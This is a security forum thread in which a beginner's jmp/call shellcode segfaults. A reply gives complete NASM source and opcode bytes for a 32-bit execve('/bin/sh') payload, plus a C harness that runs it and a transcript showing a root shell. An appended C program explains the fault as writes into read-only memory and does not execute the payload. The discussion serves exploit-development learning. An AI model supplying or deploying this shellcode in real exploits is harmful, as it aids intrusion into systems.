
Thread: basic shellcode on backtrack?

  1. #1 (Just burned his ISO, joined Jul 2010, 3 posts)

    basic shellcode on backtrack?

    Wassup everyone, how's everyone tonight? Well, I've begun exploration into the world of buffer overflows and the like, but I'm having some trouble getting my own shellcode to run. I mean it's not really shellcode yet, but attempting the jmp/call method described in aleph1's paper gives me segmentation faults on line 11 of my code.

    ASM (NASM) | section .text global _start - At_eternaty - 76rJiprD - Pastebin.com

    I'm just wondering if it's a problem in my code or if BackTrack has some kind of protection scheme for this? Not really sure, but any advice is greatly appreciated, thanks.

  2. #2 (Member, joined Jan 2010, 70 posts)

    Re: basic shellcode on backtrack?

    If the line number can be trusted, then you're segfaulting on

    mov byte [ebx+7], al ; *(char *)(ebx+7) = eax & 0xff, i.e. store the NUL terminator after "/bin/sh"

    Which makes me wonder what the value of ebx is (i.e. is it out of bounds?).

  3. #3 (Just burned his ISO, joined Jul 2010, 3 posts)

    Re: basic shellcode on backtrack?

    Well, since the call to jmpback is made, the return address of the call should be pushed on the stack, which is actually just the address of the /bin/sh string. So that's what should be in ebx, but it seems like it's not getting the value.

  4. #4 (Member, joined Jan 2010, 70 posts)

    Re: basic shellcode on backtrack?

    NOTE: I've assembled and executed the shellcode provided with no issues, using BT4 and Ubuntu 10.04 x64 (with the multilib development libraries to support building 32-bit code).

    The following is my command to turn the asm into bytecode:
    Code:
    XXXXXXXXXX:~$ cat test.s 
    section .text
    
    global _start
    
    _start:
    jmp callback
    jmpback:
    pop ebx
    xor eax, eax
    
    mov byte [ebx+7], al
    mov dword [ebx+8], ebx
    mov dword [ebx+12], eax
    lea ecx, [ebx+8]
    
    lea edx, [ebx+12]
    
    mov al, 0x0b
    int 0x80
    
    callback:
    call jmpback
    string db "/bin/sh"
    XXXXXXXXXX:~$ nasm -f elf32 test.s 
    XXXXXXXXXX:~$ objdump -d test.o 
    
    test.o:     file format elf32-i386
    
    
    Disassembly of section .text:
    
    00000000 <_start>:
       0:	e9 16 00 00 00       	jmp    1b <callback>
    
    00000005 <jmpback>:
       5:	5b                   	pop    %ebx
       6:	31 c0                	xor    %eax,%eax
       8:	88 43 07             	mov    %al,0x7(%ebx)
       b:	89 5b 08             	mov    %ebx,0x8(%ebx)
       e:	89 43 0c             	mov    %eax,0xc(%ebx)
      11:	8d 4b 08             	lea    0x8(%ebx),%ecx
      14:	8d 53 0c             	lea    0xc(%ebx),%edx
      17:	b0 0b                	mov    $0xb,%al
      19:	cd 80                	int    $0x80
    
    0000001b <callback>:
      1b:	e8 e5 ff ff ff       	call   5 <jmpback>
    
    00000020 <string>:
      20:	2f                   	das    
      21:	62 69 6e             	bound  %ebp,0x6e(%ecx)
      24:	2f                   	das    
      25:	73 68                	jae    8f <string+0x6f>
    This gets the raw byte-code.

    Then, I turn it into an executable C program with:
    Code:
    XXXXXXXXXX:~$ cat shellcode.c
    char sc[] = {
    0xe9,0x16,0x00,0x00,0x00,0x5b,0x31,0xc0,0x88,0x43,0x07,0x89,0x5b,
    0x08,0x89,0x43,0x0c,0x8d,0x4b,0x08,0x8d,0x53,0x0c,0xb0,0x0b,0xcd,
    0x80,0xe8,0xe5,0xff,0xff,0xff,0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68
    };
    
    typedef void (*f)();
    
    int main()
    {
        f func;
        func = (f)sc;
        func();
        return 0;
    
    }
    And execute, as:
    Code:
    XXXXXXXXXX:~$ gcc -o sc shellcode.c
    XXXXXXXXXX:~$ ./sc 
    sh-3.2# id
    uid=0(root) gid=0(root) groups=0(root)
    sh-3.2# exit
    exit
    Again, note I've tested on BT4 Final _AND_ ubuntu 10.04

  5. #5 (Just burned his ISO, joined Jul 2010, 3 posts)

    Re: basic shellcode on backtrack?

    Thanks a lot for your reply. It cleared up a few things. Stupid me... I was trying to assemble this code and run it from the shell rather than inside the stack. I didn't realize that the code section in protected mode is read-only, so that's why it was crashing when I was trying to add those values after the /bin/sh string.
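The root cause settled on in posts #4 and #5 is worth pinning down with a test you can run: this jmp/call shellcode is self-modifying. The three stores after `pop ebx` (`mov byte [ebx+7], al`, `mov dword [ebx+8], ebx`, `mov dword [ebx+12], eax`) write the NUL terminator and the argv array into the bytes immediately following "/bin/sh", so the code only works when it lives in writable memory (the stack, the heap, or the `.data` section of the C harness in post #4). As a standalone ELF the string sits in read-only `.text` and the first store faults. Two practitioner caveats follow from the objdump listing above: the stores land at offsets 0x27..0x2f, which is past the end of the 39-byte `sc[]` array in the C harness, so whatever follows `sc` in `.data` gets overwritten (put slack after the shellcode); and the rel32 `jmp` (`e9 16 00 00 00`) contains three NUL bytes, which a string-copy overflow would truncate on. The program below is an added example, not code from the thread: it copies the posted bytes into an anonymous mapping, performs the same store the shellcode does at `jmpback+3`, and reports whether it faults under a `.text`-like protection versus a writable one, catching SIGSEGV with `sigsetjmp`/`siglongjmp`. The function names and the page-sized buffer are my own choices. It does not execute the shellcode (the posted code is 32-bit and needs a 32-bit process).

```c
#define _GNU_SOURCE
#include <setjmp.h>
#include <signal.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

/* The 39 bytes produced by nasm/objdump in post #4, copied verbatim. */
static const unsigned char sc[] = {
    0xe9,0x16,0x00,0x00,0x00,0x5b,0x31,0xc0,0x88,0x43,0x07,0x89,0x5b,
    0x08,0x89,0x43,0x0c,0x8d,0x4b,0x08,0x8d,0x53,0x0c,0xb0,0x0b,0xcd,
    0x80,0xe8,0xe5,0xff,0xff,0xff,0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68
};

/* Offset of the "/bin/sh" label in the listing (0000020 <string>). */
#define STRING_OFF 0x20

/* Count NUL bytes: the rel32 jmp contributes three, which matters if the
 * payload is ever delivered through a C-string copy. */
size_t count_nul_bytes(const unsigned char *buf, size_t len) {
    size_t n = 0;
    for (size_t i = 0; i < len; i++)
        if (buf[i] == 0) n++;
    return n;
}

/* Highest offset the shellcode writes to: mov dword [ebx+12], eax covers
 * STRING_OFF+12 .. STRING_OFF+15. Returns how many bytes of writable slack
 * must follow the shellcode buffer for those stores to stay in bounds. */
size_t required_slack_bytes(void) {
    size_t last_written = STRING_OFF + 12 + 4;   /* one past [ebx+12] dword */
    return last_written - sizeof sc;
}

static sigjmp_buf fault_env;

static void on_segv(int sig) {
    (void)sig;
    siglongjmp(fault_env, 1);   /* unwind back into store_after_string_faults */
}

/* Copy the shellcode into a fresh page, set the requested protection, then
 * do exactly what "mov byte [ebx+7], al" does: store a NUL right after
 * "/bin/sh". Returns 1 if that store raised SIGSEGV, 0 if it succeeded,
 * -1 if the mapping itself could not be set up. */
int store_after_string_faults(int prot) {
    size_t page = (size_t)sysconf(_SC_PAGESIZE);
    unsigned char *buf = mmap(NULL, page, PROT_READ | PROT_WRITE,
                              MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (buf == MAP_FAILED) return -1;
    memcpy(buf, sc, sizeof sc);                  /* page-sized, so slack exists */
    if (mprotect(buf, page, prot) != 0) { munmap(buf, page); return -1; }

    struct sigaction sa, old;
    memset(&sa, 0, sizeof sa);
    sa.sa_handler = on_segv;
    sigemptyset(&sa.sa_mask);
    sigaction(SIGSEGV, &sa, &old);

    int faulted;
    if (sigsetjmp(fault_env, 1) == 0) {
        volatile unsigned char *p = buf + STRING_OFF + 7;   /* ebx+7 */
        *p = 0;                                              /* al == 0 here */
        faulted = 0;
    } else {
        faulted = 1;                                         /* came back via siglongjmp */
    }
    sigaction(SIGSEGV, &old, NULL);
    munmap(buf, page);
    return faulted;
}

int main(void) {
    printf("NUL bytes in shellcode: %zu\n", count_nul_bytes(sc, sizeof sc));
    printf("writable slack needed after sc[]: %zu bytes\n", required_slack_bytes());
    printf("store into r-x page (like .text) faults: %d\n",
           store_after_string_faults(PROT_READ | PROT_EXEC));
    printf("store into rwx page (like stack/.data) faults: %d\n",
           store_after_string_faults(PROT_READ | PROT_WRITE | PROT_EXEC));
    return 0;
}
```

Run it and the r-x case reports a fault while the rwx case does not, which is the difference between `./test` built straight from `test.o` and the C harness in post #4. On a modern distribution the harness itself also needs a writable and executable `.data` (`gcc -z execstack`, or an `mmap` with `PROT_EXEC` as above), since non-executable data is now the default.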
